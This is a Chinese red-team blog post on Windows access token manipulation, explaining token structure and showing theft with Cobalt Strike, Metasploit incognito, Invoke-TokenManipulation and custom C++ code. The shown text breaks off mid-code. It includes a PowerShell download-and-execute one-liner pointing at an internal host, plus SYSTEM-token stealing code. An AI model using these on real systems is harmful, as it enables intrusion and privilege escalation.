<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="cn">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
      
    
    
      
    
  <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
  <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-flash.min.css" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



















  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic|Monda:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






  

<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.4.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.4.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.4.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.4.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.4.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.4.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="“只有在梦想中，人才能真正自由。” －－《死亡诗社》  文如题目，Windows Access Token Manipulation　Attack">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows Access Token Manipulation　Attack">
<meta property="og:url" content="https://lengjibo.github.io/token/index.html">
<meta property="og:site_name" content="冷逸的个人博客|开往安河桥北~">
<meta property="og:description" content="“只有在梦想中，人才能真正自由。” －－《死亡诗社》  文如题目，Windows Access Token Manipulation　Attack">
<meta property="og:locale" content="cn">
<meta property="og:image" content="https://lengjibo.github.io/images/token/0.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/1.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/2.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/3.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/4.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/5.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/6.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/7.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/8.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/9.png">
<meta property="og:image" content="https://lengjibo.github.io/images/token/10.png">
<meta property="og:updated_time" content="2020-03-27T11:49:23.022Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Windows Access Token Manipulation　Attack">
<meta name="twitter:description" content="“只有在梦想中，人才能真正自由。” －－《死亡诗社》  文如题目，Windows Access Token Manipulation　Attack">
<meta name="twitter:image" content="https://lengjibo.github.io/images/token/0.png">



  <link rel="alternate" href="/../../.deploy_git/atom.xml" title="冷逸的个人博客|开往安河桥北~" type="application/atom+xml" />




  <link rel="canonical" href="https://lengjibo.github.io/token/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Windows Access Token Manipulation　Attack | 冷逸的个人博客|开往安河桥北~</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="cn">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">冷逸的个人博客|开往安河桥北~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Startseite</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />Über</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />Tags</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />Kategorien</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />Archiv</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-book">
    <a href="/book/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-book"></i> <br />book</a>
  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://lengjibo.github.io/token/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="冷逸">
      <meta itemprop="description" content="做一个温柔的人...">
      <meta itemprop="image" content="http://ww1.sinaimg.cn/large/007F8GgBly1g7vony4ltaj308w08wq30.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="冷逸的个人博客|开往安河桥北~">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Windows Access Token Manipulation　Attack
              
            
          </h1>
        

        <div class="post-meta">
        
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              

              
                
              

              <time title="Post created: 2020-03-27 18:04:24 / Updated at: 19:49:23" itemprop="dateCreated datePublished" datetime="2020-03-27T18:04:24+08:00">2020-03-27</time>
            

            
              

              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">in</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/RedTeam/" itemprop="url" rel="index"><span itemprop="name">RedTeam</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon"
            >
            <i class="fa fa-eye"></i>
             Views:  
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>“只有在梦想中，人才能真正自由。”</p>
<p>－－《死亡诗社》</p>
<hr>
<p>文如题目，Windows Access Token Manipulation　Attack</p>
<a id="more"></a>
<h2 id="什么是Windows-Access-Token"><a href="#什么是Windows-Access-Token" class="headerlink" title="什么是Windows Access Token"></a>什么是Windows Access Token</h2><p>对于windows access token微软官方给出的解释是这样的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">An access token is an object that describes the security context of a process or thread. </span><br><span class="line">The information in a token includes the identity and privileges of the user account associated with the process or thread.</span><br></pre></td></tr></table></figure>
<p>大体意思就是Windows Access Token(访问令牌)，它是一个描述进程或者线程安全上下文的一个对象。不同的用户登录计算机后， 都会生成一个Access Token，这个Token在用户创建进程或者线程时会被使用，不断的拷贝，这也就解释了A用户创建一个进程而该进程没有B用户的权限。当用户注销后，系统将会使主令牌切换为模拟令牌，不会将令牌清 除，只有在重启机器后才会清除 Access Token分为两种(主令牌、模拟令牌)</p>
<ul>
<li>primary token　这种令牌通常用于本地及远程RDP登录</li>
<li>impersonation token　这种则通常用于各种非交互式的登录,比如,netuse,wmi,winrm等等…</li>
</ul>
<h3 id="Windows-Access-Token组成"><a href="#Windows-Access-Token组成" class="headerlink" title="Windows Access Token组成"></a>Windows Access Token组成</h3><ul>
<li>用户帐户的安全标识符(SID)</li>
<li>用户所属的组的SID</li>
<li>用于标识当前登录会话的登录SID</li>
<li>用户或用户组所拥有的权限列表</li>
<li>所有者SID</li>
<li>主要组的SID</li>
<li>访问控制列表</li>
<li>访问令牌的来源</li>
<li>令牌是主要令牌还是模拟令牌</li>
<li>限制SID的可选列表</li>
<li>目前的模拟等级</li>
<li>其他统计数据</li>
</ul>
<h3 id="SID"><a href="#SID" class="headerlink" title="SID"></a>SID</h3><p>安全标识符(Security identifiers)，简称为SID，分别是OwnerSid和GroupSid. 所谓SID就是每次当我们创建一个用户或一个组的时候，系统会分配给改用户或组一个唯一SID，当你重新安装系统后，也会得到一个唯一的SID。SID是唯一的，不随用户的删除而分配到另外的用户使用。<br>请记住，SID永远都是唯一的SIF是由计算机名、当前时间、当前用户态线程的CPU耗费时间的总和三个参数决定以保证它的唯一性。</p>
<p>例：   S-1-5-21-1763234323-3212657521-1234321321-500</p>
<h3 id="Windows-Access-Token产生过程"><a href="#Windows-Access-Token产生过程" class="headerlink" title="Windows Access Token产生过程"></a>Windows Access Token产生过程</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">用户使用凭据(用户密码)进行认证--&gt;登录session创建--&gt;windows返回用户的sid和用户所在组的sid--&gt;LSA创建一个Access token--&gt;使用凭据成功认证--&gt;登录session--&gt;token--&gt;进程、线程</span><br></pre></td></tr></table></figure>
<p><img src="../images/token/0.png" alt="image"></p>
<p>每个进程创建时都会根据登录会话权限由LSA(Local Security Authority)分配一个Token(如果CreaetProcess时自己指定了 Token, LSA会用该Token， 否则就用父进程Token的一份拷贝。</p>
<p>过程中会检验你是否为管理员组的用户，如果是会给你一个具有完整管理员权限的令牌和一个标准用户的令牌(包含提权权限)，如果是普通用户则只给一个普通令牌。</p>
<p>顺便提一句登录方式：</p>
<ul>
<li>交互登录（凭据存放在lsass.exe内）：控制台登录2、rdp登录10、psexec登录2</li>
<li>网络登录（证书不在内存中）：wmi3、winrm3</li>
<li>smart登录….</li>
</ul>
<h2 id="cobalt-strike模拟令牌"><a href="#cobalt-strike模拟令牌" class="headerlink" title="cobalt strike模拟令牌"></a>cobalt strike模拟令牌</h2><p>主要是使用steal_token模拟令牌，rev2self撤回令牌。</p>
<p><img src="../images/token/1.png" alt="image"></p>
<h2 id="metasploit模拟令牌"><a href="#metasploit模拟令牌" class="headerlink" title="metasploit模拟令牌"></a>metasploit模拟令牌</h2><p>incognito模块，同样rev2self撤回令牌。</p>
<p><img src="../images/token/2.png" alt="image"></p>
<p>或者用它的独立程序去执行一个文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">incognito.exe execute &quot;WEBSERVER-IIS7\Administrator&quot; &quot;powershell.exe -nop -whidden -c &quot;IEX((new-objectnet.webclient).downloadstring(&apos;http://192.168.3.69:81/incognito&apos;))\&quot;&quot;</span><br></pre></td></tr></table></figure>
<h2 id="Invoke-TokenManipulation模拟令牌"><a href="#Invoke-TokenManipulation模拟令牌" class="headerlink" title="Invoke-TokenManipulation模拟令牌"></a>Invoke-TokenManipulation模拟令牌</h2><p>Invoke-TokenManipulation是一个powershell脚本，可以用于枚举、模拟令牌。</p>
<p>枚举令牌并保存到文件</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Invoke-TokenManipulation-Enumerate|out-fileres.txt</span><br></pre></td></tr></table></figure>
<p>模拟令牌起进程：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Invoke-TokenManipulation-CreateProcess<span class="string">"cmd.exe"</span>-Username<span class="string">"WEBSERVER-IIS7\Administrator"</span></span><br></pre></td></tr></table></figure>
<p>模拟进程令牌起进程：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Invoke-TokenManipulation-CreateProcess<span class="string">"cmd.exe"</span>-ProcessId1892</span><br></pre></td></tr></table></figure>
<h2 id="令牌模拟的细节"><a href="#令牌模拟的细节" class="headerlink" title="令牌模拟的细节"></a>令牌模拟的细节</h2><p>在进行令牌模拟的时候，我们一般需要下面的api：</p>
<p><img src="../images/token/3.png" alt="image"></p>
<p>过程是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openprocess() --&gt; openprocesstoken() --&gt; impersonateloggedonuser()--&gt; duplicatetokenex() --&gt; createprocesswithtokenw()</span><br></pre></td></tr></table></figure>
<p>demo（ired的）：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">"stdafx.h"</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> * argv[])</span> </span>&#123;</span><br><span class="line"><span class="keyword">char</span> a;</span><br><span class="line">HANDLE processHandle;</span><br><span class="line">HANDLE tokenHandle = <span class="literal">NULL</span>;</span><br><span class="line">HANDLE duplicateTokenHandle = <span class="literal">NULL</span>;</span><br><span class="line">STARTUPINFO startupInfo;</span><br><span class="line">PROCESS_INFORMATION processInformation;</span><br><span class="line">DWORD PID_TO_IMPERSONATE = <span class="number">3060</span>;</span><br><span class="line"><span class="keyword">wchar_t</span> cmdline[] = <span class="string">L"C:\\shell.cmd"</span>;</span><br><span class="line">ZeroMemory(&amp;startupInfo, <span class="keyword">sizeof</span>(STARTUPINFO));</span><br><span class="line">ZeroMemory(&amp;processInformation, <span class="keyword">sizeof</span>(PROCESS_INFORMATION));</span><br><span class="line">startupInfo.cb = <span class="keyword">sizeof</span>(STARTUPINFO);</span><br><span class="line">processHandle = OpenProcess(PROCESS_ALL_ACCESS, <span class="literal">true</span>, PID_TO_IMPERSONATE);</span><br><span class="line">OpenProcessToken(processHandle, TOKEN_ALL_ACCESS, &amp;tokenHandle);</span><br><span class="line">DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, <span class="literal">NULL</span>, SecurityImpersonation, TokenPrimary, &amp;duplicateTokenHandle);</span><br><span class="line">CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, <span class="literal">NULL</span>, cmdline, <span class="number">0</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, &amp;startupInfo, &amp;processInformation);</span><br><span class="line"><span class="built_in">std</span>::<span class="built_in">cin</span> &gt;&gt; a;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>运行该程序，我们就可以获得一个3060进程令牌权限运行的shell.cmd的进程。当然，你需要有这个进程的访问权限。</p>
<p>但是也并不是所有的进程都都是可以被操作的，比如看下面的这个图：</p>
<p><img src="../images/token/4.png" alt="image"></p>
<p>我们可以清楚的看到wmiprvse进程便无法被打开，主要是无法打开token。<br>那么为什么会出现这种问题呢？</p>
<p>先不急，我们先看一下所有的令牌，因为我们的目的就是获取system令牌。</p>
<p>使用下面的脚本进行获取(<a href="https://gist.githubusercontent.com/vector-sec/a049bf12da619d9af8f9c7dbd28d3b56/raw/eaddf4151ebe4345623b7066a2c768665805fcad/Get-Token.ps1" target="_blank" rel="noopener">https://gist.githubusercontent.com/vector-sec/a049bf12da619d9af8f9c7dbd28d3b56/raw/eaddf4151ebe4345623b7066a2c768665805fcad/Get-Token.ps1</a>)</p>
<p><img src="../images/token/5.png" alt="image"></p>
<p>然后简单修改下，变成只获取system权限的进程：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">get-token | where-object &#123;$_.username -eq &apos;NT AUTHORITY\SYSTEM&apos; -and $_.ownername -ne &apos;NT AUTHORITY\SYSTEM&apos;&#125; | select-object processname,processsid|format-table</span><br></pre></td></tr></table></figure>
<p>这样列出的进程和进程号，是只为system权限的进程。</p>
<p>然后经过测试发现像csrss、service、wininit、smss等token获取失败</p>
<p><img src="../images/token/6.png" alt="image"></p>
<p>查看发现存在同一个问题：存在protect</p>
<p>根据微软文档，我们可以知道</p>
<p><img src="../images/token/7.png" alt="image"></p>
<p>只需要在openprocess中将第一个参数改成PROCESS_QUERY_LIMITED_INFORMATION即可。</p>
<p>那么只需要在primarytokentheft里面加一个判断即可，修改后的代码如下：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Lmcons.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function">BOOL <span class="title">SetPrivilege</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params">	HANDLE hToken,         </span></span></span><br><span class="line"><span class="function"><span class="params">	LPCTSTR lpszPrivilege, </span></span></span><br><span class="line"><span class="function"><span class="params">	BOOL bEnablePrivilege  </span></span></span><br><span class="line"><span class="function"><span class="params">)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	TOKEN_PRIVILEGES tp;</span><br><span class="line">	LUID luid;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (!LookupPrivilegeValue(</span><br><span class="line">		<span class="literal">NULL</span>,          </span><br><span class="line">		lpszPrivilege,   </span><br><span class="line">		&amp;luid))       </span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] LookupPrivilegeValue error: %u\n"</span>, GetLastError());</span><br><span class="line">		<span class="keyword">return</span> FALSE;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	tp.PrivilegeCount = <span class="number">1</span>;</span><br><span class="line">	tp.Privileges[<span class="number">0</span>].Luid = luid;</span><br><span class="line">	<span class="keyword">if</span> (bEnablePrivilege)</span><br><span class="line">		tp.Privileges[<span class="number">0</span>].Attributes = SE_PRIVILEGE_ENABLED;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">		tp.Privileges[<span class="number">0</span>].Attributes = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (!AdjustTokenPrivileges(</span><br><span class="line">		hToken,</span><br><span class="line">		FALSE,</span><br><span class="line">		&amp;tp,</span><br><span class="line">		<span class="keyword">sizeof</span>(TOKEN_PRIVILEGES),</span><br><span class="line">		(PTOKEN_PRIVILEGES)<span class="literal">NULL</span>,</span><br><span class="line">		(PDWORD)<span class="literal">NULL</span>))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] AdjustTokenPrivileges error: %u\n"</span>, GetLastError());</span><br><span class="line">		<span class="keyword">return</span> FALSE;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (GetLastError() == ERROR_NOT_ALL_ASSIGNED)</span><br><span class="line"></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[-] The token does not have the specified privilege. \n"</span>);</span><br><span class="line">		<span class="keyword">return</span> FALSE;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> TRUE;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">std</span>::<span class="function"><span class="built_in">string</span> <span class="title">get_username</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	TCHAR username[UNLEN + <span class="number">1</span>];</span><br><span class="line">	DWORD username_len = UNLEN + <span class="number">1</span>;</span><br><span class="line">	GetUserName(username, &amp;username_len);</span><br><span class="line">	<span class="built_in">std</span>::<span class="function">wstring <span class="title">username_w</span><span class="params">(username)</span></span>;</span><br><span class="line">	std::string username_s(username_w.begin(), username_w.end());</span><br><span class="line">	<span class="keyword">return</span> username_s;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span>** argv)</span> </span>&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">if</span> (argc &lt;= <span class="number">1</span>) &#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"USAGE: TokenSteal.exe Process PID"</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"Primary Access Token Manipulation by lengyi \n\n"</span>);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"[+] Current user is: %s\n"</span>, (get_username()).c_str());</span><br><span class="line"></span><br><span class="line">	</span><br><span class="line">	<span class="keyword">char</span>* pid_c = argv[<span class="number">1</span>];</span><br><span class="line">	DWORD PID_TO_IMPERSONATE = atoi(pid_c);</span><br><span class="line"></span><br><span class="line">	</span><br><span class="line">	HANDLE tokenHandle = <span class="literal">NULL</span>;</span><br><span class="line">	HANDLE duplicateTokenHandle = <span class="literal">NULL</span>;</span><br><span class="line">	STARTUPINFO startupInfo;</span><br><span class="line">	PROCESS_INFORMATION processInformation;</span><br><span class="line">	ZeroMemory(&amp;startupInfo, <span class="keyword">sizeof</span>(STARTUPINFO));</span><br><span class="line">	ZeroMemory(&amp;processInformation, <span class="keyword">sizeof</span>(PROCESS_INFORMATION));</span><br><span class="line">	startupInfo.cb = <span class="keyword">sizeof</span>(STARTUPINFO);</span><br><span class="line"></span><br><span class="line">	</span><br><span class="line">	HANDLE currentTokenHandle = <span class="literal">NULL</span>;</span><br><span class="line">	BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &amp;currentTokenHandle);</span><br><span class="line">	<span class="keyword">if</span> (SetPrivilege(currentTokenHandle, <span class="string">L"SeDebugPrivilege"</span>, TRUE))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[+] SeDebugPrivilege enabled!\n"</span>);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	</span><br><span class="line">	HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, <span class="literal">true</span>, PID_TO_IMPERSONATE);</span><br><span class="line">	<span class="keyword">if</span> (GetLastError() == <span class="literal">NULL</span>)</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"[+] OpenProcess() success!\n"</span>);</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, <span class="literal">true</span>, PID_TO_IMPERSONATE);</span><br><span class="line">		<span class="keyword">if</span> (GetLastError() == <span class="literal">NULL</span>) &#123;</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">"[+] OpenProcess() success!\n"</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">		&#123;</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">"[-] OpenProcess() Return Code: %i\n"</span>, processHandle);</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">"[-] OpenProcess() Error: %i\n"</span>, GetLastError());</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	BOOL getToken = 